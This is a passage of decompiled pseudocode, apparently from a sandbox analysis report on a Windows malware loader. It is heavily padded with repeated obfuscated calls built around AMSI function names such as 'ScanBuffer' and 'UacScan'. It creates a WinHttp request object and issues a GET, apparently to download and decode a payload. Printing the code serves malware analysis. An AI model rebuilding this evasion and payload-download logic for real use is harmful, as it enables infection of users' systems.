						E02867B80(_v796, _t6115); // executed
						_t4450 =  *0x28a6600; // 0x29bf4b0
						_t4451 = E0286C4E4(_t4450, 0x2874d48);
						__eflags = _t4451;
						if(_t4451 != 0) {
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v804, E02854964(_v808));
							_push(_v804);
							_t5083 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v816, _t5083, 0x2874c4c);
							E02854698( &_v812, E02854964(_v816));
							_pop(_t6121); // executed
							E02867B80(_v812, _t6121); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v820, E02854964(_v824));
							_push(_v820);
							_t5084 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v832, _t5084, 0x2874c4c);
							E02854698( &_v828, E02854964(_v832));
							_pop(_t6126); // executed
							E02867B80(_v828, _t6126); // executed
							_push(0); // executed
							L0285CD94(); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v836, E02854964(_v840));
							_push(_v836);
							_t5085 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v848, _t5085, 0x2874c4c);
							E02854698( &_v844, E02854964(_v848));
							_pop(_t6131); // executed
							E02867B80(_v844, _t6131); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("UacScan");
							E02854824();
							E02854698( &_v852, E02854964(_v856));
							_push(_v852);
							_t5086 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v864, _t5086, 0x2874c4c);
							E02854698( &_v860, E02854964(_v864));
							_pop(_t6136); // executed
							E02867B80(_v860, _t6136); // executed
							E02866DC0("WinHttp.WinHttpRequest.5.1", 0x28a65d4,  &_v868, _t6274, _t6275, __eflags); // executed
							E0286287C(0x28a655c, _v868);
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v872, E02854964(_v876));
							_push(_v872);
							_t5087 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v884, _t5087, 0x2874c4c);
							E02854698( &_v880, E02854964(_v884));
							_pop(_t6143); // executed
							E02867B80(_v880, _t6143); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("ScanString");
							E02854824();
							E02854698( &_v888, E02854964(_v892));
							_push(_v888);
							_t5088 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v900, _t5088, 0x2874c4c);
							E02854698( &_v896, E02854964(_v900));
							_pop(_t6148); // executed
							E02867B80(_v896, _t6148); // executed
							_push(0);
							_push(0x28a6600);
							E0285E3E0(0, 0x28a655c, 0x2874d80, "GET"); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v904, E02854964(_v908));
							_push(_v904);
							_t5089 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v916, _t5089, 0x2874c4c);
							E02854698( &_v912, E02854964(_v916));
							_pop(_t6153); // executed
							E02867B80(_v912, _t6153); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v920, E02854964(_v924));
							_push(_v920);
							_t5090 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v932, _t5090, 0x2874c4c);
							E02854698( &_v928, E02854964(_v932));
							_pop(_t6158); // executed
							E02867B80(_v928, _t6158); // executed
							_push(0x2874d8c);
							_push(0x28a655c);
							_push(0); // executed
							E0285E3E0(); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v936, E02854964(_v940));
							_push(_v936);
							_t5091 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v948, _t5091, 0x2874c4c);
							E02854698( &_v944, E02854964(_v948));
							_pop(_t6163); // executed
							E02867B80(_v944, _t6163); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("ScanString");
							E02854824();
							E02854698( &_v952, E02854964(_v956));
							_push(_v952);
							_t5092 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v964, _t5092, 0x2874c4c);
							E02854698( &_v960, E02854964(_v964));
							_pop(_t6168); // executed
							E02867B80(_v960, _t6168); // executed
							_push(0x2874d98);
							_push(0x28a655c);
							_push( &_v980); // executed
							E0285E3E0(); // executed
							_t6278 = _t6278 + 0x30;
							E028617CC(0x28a658c, 0x28a65d4,  &_v980, _t6274, _t6275, _t6295); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("Initialize");
							E02854824();
							E02854698( &_v984, E02854964(_v988));
							_push(_v984);
							_t5093 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v996, _t5093, 0x2874c4c);
							E02854698( &_v992, E02854964(_v996));
							_pop(_t6174); // executed
							E02867B80(_v992, _t6174); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("ScanString");
							E02854824();
							E02854698( &_v1000, E02854964(_v1004));
							_push(_v1000);
							_t5094 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v1012, _t5094, 0x2874c4c);
							E02854698( &_v1008, E02854964(_v1012));
							_pop(_t6179); // executed
							E02867B80(_v1008, _t6179);
							_t4630 =  *0x28a658c; // 0x7f530018
							_v1016 = _t4630;
							_t4631 = _v1016;
							__eflags = _t4631;
							if(_t4631 != 0) {
								_t4692 = _t4631 - 4;
								__eflags = _t4692;
								_t4631 =  *_t4692;
							}
							__eflags = _t4631 - 0x7530;
							if(_t4631 > 0x7530) {
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("OpenSession");
								E02854824();
								E02854698( &_v1020, E02854964(_v1024));
								_push(_v1020);
								_t5097 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v1032, _t5097, 0x2874c4c);
								E02854698( &_v1028, E02854964(_v1032));
								_pop(_t6194); // executed
								E02867B80(_v1028, _t6194); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanBuffer");
								E02854824();
								E02854698( &_v1036, E02854964(_v1040));
								_push(_v1036);
								_t5098 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v1048, _t5098, 0x2874c4c);
								E02854698( &_v1044, E02854964(_v1048));
								_pop(_t6199); // executed
								E02867B80(_v1044, _t6199); // executed
								_t4688 =  *0x28a658c; // 0x7f530018
								E0286C8D8(_t4688, _t5098,  &_v1052);
								E028544F4(0x28a65c8, _v1052);
							}
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("Initialize");
							E02854824();
							E02854698( &_v1056, E02854964(_v1060));
							_push(_v1056);
							_t5095 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v1068, _t5095, 0x2874c4c);
							E02854698( &_v1064, E02854964(_v1068));
							_pop(_t6184); // executed
							E02867B80(_v1064, _t6184); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("UacScan");
							E02854824();
							E02854698( &_v1072, E02854964(_v1076));
							_push(_v1072);
							_t5096 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v1084, _t5096, 0x2874c4c);
							E02854698( &_v1080, E02854964(_v1084));
							_pop(_t6189); // executed
							E02867B80(_v1080, _t6189); // executed
							L0285CD9C(); // executed
						}
					}
				} else {
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v292, E02854964(_v296));
					_push(_v292);
					_t5099 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v304, _t5099, 0x2874c4c);
					E02854698( &_v300, E02854964(_v304));
					_pop(_t6206);
					E02867B80(_v300, _t6206);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v308, E02854964(_v312));
					_push(_v308);
					_t5100 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v320, _t5100, 0x2874c4c);
					E02854698( &_v316, E02854964(_v320));
					_pop(_t6211);
					E02867B80(_v316, _t6211);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v324, E02854964(_v328));
					_push(_v324);
					_t5101 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v336, _t5101, 0x2874c4c);
					E02854698( &_v332, E02854964(_v336));
					_pop(_t6216);
					E02867B80(_v332, _t6216);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v340, E02854964(_v344));
					_push(_v340);
					_t5102 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v352, _t5102, 0x2874c4c);
					E02854698( &_v348, E02854964(_v352));
					_pop(_t6221);
					E02867B80(_v348, _t6221);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v356, E02854964(_v360));
					_push(_v356);
					_t5103 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v368, _t5103, 0x2874c4c);
					E02854698( &_v364, E02854964(_v368));
					_pop(_t6226);
					E02867B80(_v364, _t6226);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v372, E02854964(_v376));
					_push(_v372);
					_t5104 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v384, _t5104, 0x2874c4c);
					E02854698( &_v380, E02854964(_v384));
					_pop(_t6231);
					E02867B80(_v380, _t6231);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v388, E02854964(_v392));
					_push(_v388);
					_t5105 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v400, _t5105, 0x2874c4c);
					E02854698( &_v396, E02854964(_v400));
					_pop(_t6236);
					E02867B80(_v396, _t6236);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v404, E02854964(_v408));
					_push(_v404);
					_t5106 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v416, _t5106, 0x2874c4c);
					E02854698( &_v412, E02854964(_v416));
					_pop(_t6241);
					E02867B80(_v412, _t6241);
					_t4805 =  *0x28a6590; // 0x29f1b78
					if(E0286BEB8(_t4805, 0x28a65d4, _t6241, _t6274, _t6275, _t6284, _t6295) == 1) {
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v420, E02854964(_v424));
						_push(_v420);
						_t5107 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v432, _t5107, 0x2874c4c);
						E02854698( &_v428, E02854964(_v432));
						_pop(_t6246);
						E02867B80(_v428, _t6246);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v436, E02854964(_v440));
						_push(_v436);
						_t5108 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v448, _t5108, 0x2874c4c);
						E02854698( &_v444, E02854964(_v448));
						_pop(_t6251);
						E02867B80(_v444, _t6251);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v452, E02854964(_v456));
						_push(_v452);
						_t5109 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v464, _t5109, 0x2874c4c);
						E02854698( &_v460, E02854964(_v464));
						_pop(_t6256);
						E02867B80(_v460, _t6256);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v468, E02854964(_v472));
						_push(_v468);
						_t5110 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v480, _t5110, 0x2874c4c);
						E02854698( &_v476, E02854964(_v480));
						_pop(_t6261);
						E02867B80(_v476, _t6261);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v484, E02854964(_v488));
						_push(_v484);
						_t5111 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v496, _t5111, 0x2874c4c);
						E02854698( &_v492, E02854964(_v496));
						_pop(_t6266);
						E02867B80(_v492, _t6266);
					}
				}
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("OpenSession");
				E02854824();
				E02854698( &_v1088, E02854964(_v1092));
				_push(_v1088);
				_t4929 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v1100, _t4929, 0x2874c4c);
				E02854698( &_v1096, E02854964(_v1100));
				_pop(_t5266); // executed
				E02867B80(_v1096, _t5266); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanString");
				E02854824();
				E02854698( &_v1104, E02854964(_v1108));
				_push(_v1104);
				_t4930 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v1116, _t4930, 0x2874c4c);
				E02854698( &_v1112, E02854964(_v1116));
				_pop(_t5271); // executed
				E02867B80(_v1112, _t5271);
				_t2170 =  *0x28a65c8; // 0x7f3c0018
				_v1016 = _t2170;
				_t2171 = _v1016;
				if(_t2171 != 0) {
					_t2171 =  *((intOrPtr*)(_t2171 - 4));
				}
				_t6288 = _t2171 - 0x493e0;
				if(_t2171 <= 0x493e0) {
					L43:
					__eflags = 0;
					_pop(_t5272);
					 *[fs:eax] = _t5272;
					_push(0x2874c23);
					E028544C4( &_v4372, 0x64);
					E028544C4( &_v3972, 0x15);
					E02854C24( &_v3888);
					E028544A0( &_v3884);
					E02854C24( &_v3880);
					E028544C4( &_v3876, 0x4b);
					E028544A0( &_v3564);
					E028544C4( &_v3576, 3);
					E028544C4( &_v3560, 0x36);
					E02854C3C( &_v3344, 3);
					E028544C4( &_v3332, 8);
					E02854C3C( &_v3300, 6);
					E028544C4( &_v3276, 8);
					E028544C4( &_v2988, 0x11);
					E028544A0( &_v2908);
					E028544C4( &_v2920, 3);
					E028544C4( &_v2904, 0xc);
					E02854C24( &_v2856);
					E028544A0( &_v2852);
					E02854C24( &_v2848);
					E028544C4( &_v2844, 0x26);
					E02854C24( &_v2692);
					E028544A0( &_v2688);
					E02854C24( &_v2684);
					E028544C4( &_v2680, 0x19);
					E02854C24( &_v2580);
					E028544A0( &_v2576);
					E02854C24( &_v2572);
					E028544C4( &_v2568, 0xd);
					E028544C4( &_v2516, 0xd);
					E02854C24( &_v2464);
					E028544A0( &_v2460);
					E02854C24( &_v2456);
					E028544C4( &_v2452, 0x53);
					E028544A0( &_v2108);
					E028544C4( &_v2120, 3);
					E028544C4( &_v2104, 0x4e);
					E02854C24( &_v1792);
					E028544A0( &_v1788);
					E02854C24( &_v1784);
					E028544C4( &_v1780, 0x10);
					E028544C4( &_v1716, 0x63);
					_t5294 =  *0x286bc00; // 0x286bc04
					E028557A0( &_v1320, _t5294);
					E028544C4( &_v1316, 0x4b);
					E028544C4( &_v1012, 8);
					E0285E3D8( &_v980);
					E028544C4( &_v964, 0x10);
					E028544C4( &_v900, 8);
					E02855E70( &_v868);
					E028544C4( &_v864, 0x45);
					_t5300 =  *0x286bc00; // 0x286bc04
					E028557A0( &_v588, _t5300);
					E028544C4( &_v584, 8);
					E02854C24( &_v552);
					E028544C4( &_v548, 9);
					E028544C4( &_v508, 3);
					E028544A0( &_v512);
					E028544C4( &_v496, 0x63);
					return E028544C4( &_v100, 0x18);
				} else {
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1120, E02854964(_v1124));
					_push(_v1120);
					_t4933 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1132, _t4933, 0x2874c4c);
					E02854698( &_v1128, E02854964(_v1132));
					_pop(_t5310); // executed
					E02867B80(_v1128, _t5310); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v1136, E02854964(_v1140));
					_push(_v1136);
					_t4934 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1148, _t4934, 0x2874c4c);
					E02854698( &_v1144, E02854964(_v1148));
					_pop(_t5315); // executed
					E02867B80(_v1144, _t5315); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1152, E02854964(_v1156));
					_push(_v1152);
					_t4935 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1164, _t4935, 0x2874c4c);
					E02854698( &_v1160, E02854964(_v1164));
					_pop(_t5320); // executed
					E02867B80(_v1160, _t5320); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1168, E02854964(_v1172));
					_push(_v1168);
					_t4936 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1180, _t4936, 0x2874c4c);
					E02854698( &_v1176, E02854964(_v1180));
					_pop(_t5325); // executed
					E02867B80(_v1176, _t5325);
					_t2345 =  *0x28a6590; // 0x29f1b78
					_t2346 = E02857AB0(_t2345, _t6288);
					_t2347 =  *0x28a65c8; // 0x7f3c0018, executed
					E0286C5D0(_t2347, 0x28a65d4,  &_v1184, _t2346, _t6275); // executed
					E028544F4(0x28a6558, _v1184);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v1188, E02854964(_v1192));
					_push(_v1188);
					_t4938 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1200, _t4938, 0x2874c4c);
					E02854698( &_v1196, E02854964(_v1200));
					_pop(_t5332); // executed
					E02867B80(_v1196, _t5332); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v1204, E02854964(_v1208));
					_push(_v1204);
					_t4939 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1216, _t4939, 0x2874c4c);
					E02854698( &_v1212, E02854964(_v1216));
					_pop(_t5337); // executed
					E02867B80(_v1212, _t5337); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1220, E02854964(_v1224));
					_push(_v1220);
					_t4940 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1232, _t4940, 0x2874c4c);
					E02854698( &_v1228, E02854964(_v1232));
					_pop(_t5342); // executed
					E02867B80(_v1228, _t5342); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1236, E02854964(_v1240));
					_push(_v1236);
					_t4941 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1248, _t4941, 0x2874c4c);
					E02854698( &_v1244, E02854964(_v1248));
					_pop(_t5347); // executed
					E02867B80(_v1244, _t5347); // executed
					_t2407 =  *0x28a6558; // 0x7f200018
					E0286C56C(_t2407, _t4941,  &_v1252);
					E028544F4(0x28a6588, _v1252);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v1256, E02854964(_v1260));
					_push(_v1256);
					_t4942 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1268, _t4942, 0x2874c4c);
					E02854698( &_v1264, E02854964(_v1268));
					_pop(_t5354); // executed
					E02867B80(_v1264, _t5354); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v1272, E02854964(_v1276));
					_push(_v1272);
					_t4943 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1284, _t4943, 0x2874c4c);
					E02854698( &_v1280, E02854964(_v1284));
					_pop(_t5359); // executed
					E02867B80(_v1280, _t5359); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1288, E02854964(_v1292));
					_push(_v1288);
					_t4944 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1300, _t4944, 0x2874c4c);
					E02854698( &_v1296, E02854964(_v1300));
					_pop(_t5364); // executed
					E02867B80(_v1296, _t5364); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1304, E02854964(_v1308));
					_push(_v1304);
					_t4945 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1316, _t4945, 0x2874c4c);
					E02854698( &_v1312, E02854964(_v1316));
					_pop(_t5369); // executed
					E02867B80(_v1312, _t5369); // executed
					_t5370 =  *0x2877ae4; // 0x676974
					E02854728( &_v1324, _t5370);
					_t2469 =  *0x28a6588; // 0x7f300018, executed
					E0286BF30(_t2469, 0x28a65d4,  &_v1320, _v1324, _t6274, _t6275); // executed
					_t4947 =  *0x286bc00; // 0x286bc04
					E028557DC(0x28a65d4, _t4947, _v1320);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v1328, E02854964(_v1332));
					_push(_v1328);
					_t4948 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1340, _t4948, 0x2874c4c);
					E02854698( &_v1336, E02854964(_v1340));
					_pop(_t5377); // executed
					E02867B80(_v1336, _t5377); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v1344, E02854964(_v1348));
					_push(_v1344);
					_t4949 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1356, _t4949, 0x2874c4c);
					E02854698( &_v1352, E02854964(_v1356));
					_pop(_t5382); // executed
					E02867B80(_v1352, _t5382); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1360, E02854964(_v1364));
					_push(_v1360);
					_t4950 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1372, _t4950, 0x2874c4c);
					E02854698( &_v1368, E02854964(_v1372));
					_pop(_t5387); // executed
					E02867B80(_v1368, _t5387); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1376, E02854964(_v1380));
					_push(_v1376);
					_t4951 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1388, _t4951, 0x2874c4c);
					E02854698( &_v1384, E02854964(_v1388));
					_pop(_t5392); // executed
					E02867B80(_v1384, _t5392); // executed
					E028544F4(0x28a6628,  *((intOrPtr*)( *0x28a65d4 + 4)));
					E028544F4(0x28a6620,  *((intOrPtr*)( *0x28a65d4 + 8)));
					E028544F4(0x28a65c0,  *((intOrPtr*)( *0x28a65d4 + 0xc)));
					E028544F4(0x28a6624,  *((intOrPtr*)( *0x28a65d4 + 0x10)));
					E028544F4(0x28a660c,  *((intOrPtr*)( *0x28a65d4 + 0x14)));
					E028544F4(0x28a6610,  *((intOrPtr*)( *0x28a65d4 + 0x18)));
					E028544F4(0x28a6614,  *((intOrPtr*)( *0x28a65d4 + 0x1c)));
					E028544F4(0x28a6618,  *((intOrPtr*)( *0x28a65d4 + 0x20)));
					E028544F4(0x28a6604,  *((intOrPtr*)( *0x28a65d4 + 0x24)));
					E028544F4(0x28a657c,  *((intOrPtr*)( *0x28a65d4 + 0x28)));
					E028544F4(0x28a6580,  *((intOrPtr*)( *0x28a65d4 + 0x2c)));
					E028544F4(0x28a6584,  *((intOrPtr*)( *0x28a65d4 + 0x30)));
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1392, E02854964(_v1396));
					_push(_v1392);
					_t4952 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1404, _t4952, 0x2874c4c);
					E02854698( &_v1400, E02854964(_v1404));
					_pop(_t5421); // executed
					E02867B80(_v1400, _t5421); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v1408, E02854964(_v1412));
					_push(_v1408);
					_t4953 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1420, _t4953, 0x2874c4c);
					E02854698( &_v1416, E02854964(_v1420));
					_pop(_t5426); // executed
					E02867B80(_v1416, _t5426);
					_t2581 =  *0x28a65d0; // 0x29d4d80
					E02854698( &_v1424, E02854964(_t2581));
					if(E02857E64(_v1424) == 0) {
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v1428, E02854964(_v1432));
						_push(_v1428);
						_t5072 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v1440, _t5072, 0x2874c4c);
						E02854698( &_v1436, E02854964(_v1440));
						_pop(_t6067);
						E02867B80(_v1436, _t6067);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v1444, E02854964(_v1448));
						_push(_v1444);
						_t5073 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v1456, _t5073, 0x2874c4c);
						E02854698( &_v1452, E02854964(_v1456));
						_pop(_t6072);
						E02867B80(_v1452, _t6072);
						_t4325 =  *0x28a65d0; // 0x29d4d80
						E02854698( &_v1460, E02854964(_t4325));
						E0285802C(_v1460);
					}
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1464, E02854964(_v1468));
					_push(_v1464);
					_t4954 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1476, _t4954, 0x2874c4c);
					E02854698( &_v1472, E02854964(_v1476));
					_pop(_t5432); // executed
					E02867B80(_v1472, _t5432); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1480, E02854964(_v1484));
					_push(_v1480);
					_t4955 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1492, _t4955, 0x2874c4c);
					E02854698( &_v1488, E02854964(_v1492));
					_pop(_t5437); // executed
					E02867B80(_v1488, _t5437);
					_t2615 =  *0x28a6620; // 0x29f97a8
					_v1016 = _t2615;
					_t4897 = _v1016;
					if(_t4897 != 0) {
						_t4897 =  *((intOrPtr*)(_t4897 - 4));
					}
					_t2616 =  *0x28a6620; // 0x29f97a8
					E028549C4(_t2616, _t4897 != 3, 1, 0x28a6620);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1496, E02854964(_v1500));
					_push(_v1496);
					_t4958 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1508, _t4958, 0x2874c4c);
					E02854698( &_v1504, E02854964(_v1508));
					_pop(_t5443); // executed
					E02867B80(_v1504, _t5443); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v1512, E02854964(_v1516));
					_push(_v1512);
					_t4959 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1524, _t4959, 0x2874c4c);
					E02854698( &_v1520, E02854964(_v1524));
					_pop(_t5448); // executed
					E02867B80(_v1520, _t5448); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v1528, E02854964(_v1532));
					_push(_v1528);
					_t4960 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1540, _t4960, 0x2874c4c);
					E02854698( &_v1536, E02854964(_v1540));
					_pop(_t5453); // executed
					E02867B80(_v1536, _t5453); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v1544, E02854964(_v1548));
					_push(_v1544);
					_t4961 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v1556, _t4961, 0x2874c4c);
					E02854698( &_v1552, E02854964(_v1556));
					_pop(_t5458); // executed
					E02867B80(_v1552, _t5458);
					_t2674 =  *0x28a660c; // 0x29f1bc8
					E028548B0(_t2674, 0x2874db0);
					if(_t4897 != 3) {
						L28:
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v2108, E02854964(_v2112));
						_push(_v2108);
						_t4962 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2120, _t4962, 0x2874c4c);
						E02854698( &_v2116, E02854964(_v2120));
						_pop(_t5464); // executed
						E02867B80(_v2116, _t5464); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v2124, E02854964(_v2128));
						_push(_v2124);
						_t4963 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2136, _t4963, 0x2874c4c);
						E02854698( &_v2132, E02854964(_v2136));
						_pop(_t5469); // executed
						E02867B80(_v2132, _t5469); // executed
						_t5470 =  *0x28a6628; // 0x29ce9d8
						_t2704 =  *0x28a65c0; // 0x7edf0018, executed
						E0286C07C(_t2704, _t4897,  &_v2140, _t5470, _t6274, _t6275); // executed
						E028544F4(0x28a6574, _v2140);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v2144, E02854964(_v2148));
						_push(_v2144);
						_t4965 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2156, _t4965, 0x2874c4c);
						E02854698( &_v2152, E02854964(_v2156));
						_pop(_t5476); // executed
						E02867B80(_v2152, _t5476); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v2160, E02854964(_v2164));
						_push(_v2160);
						_t4966 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2172, _t4966, 0x2874c4c);
						E02854698( &_v2168, E02854964(_v2172));
						_pop(_t5481); // executed
						E02867B80(_v2168, _t5481); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v2176, E02854964(_v2180));
						_push(_v2176);
						_t4967 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2188, _t4967, 0x2874c4c);
						E02854698( &_v2184, E02854964(_v2188));
						_pop(_t5486); // executed
						E02867B80(_v2184, _t5486);
						_t2750 =  *0x28a6618; // 0x29f1bf8
						_t2751 = E02857AB0(_t2750, __eflags);
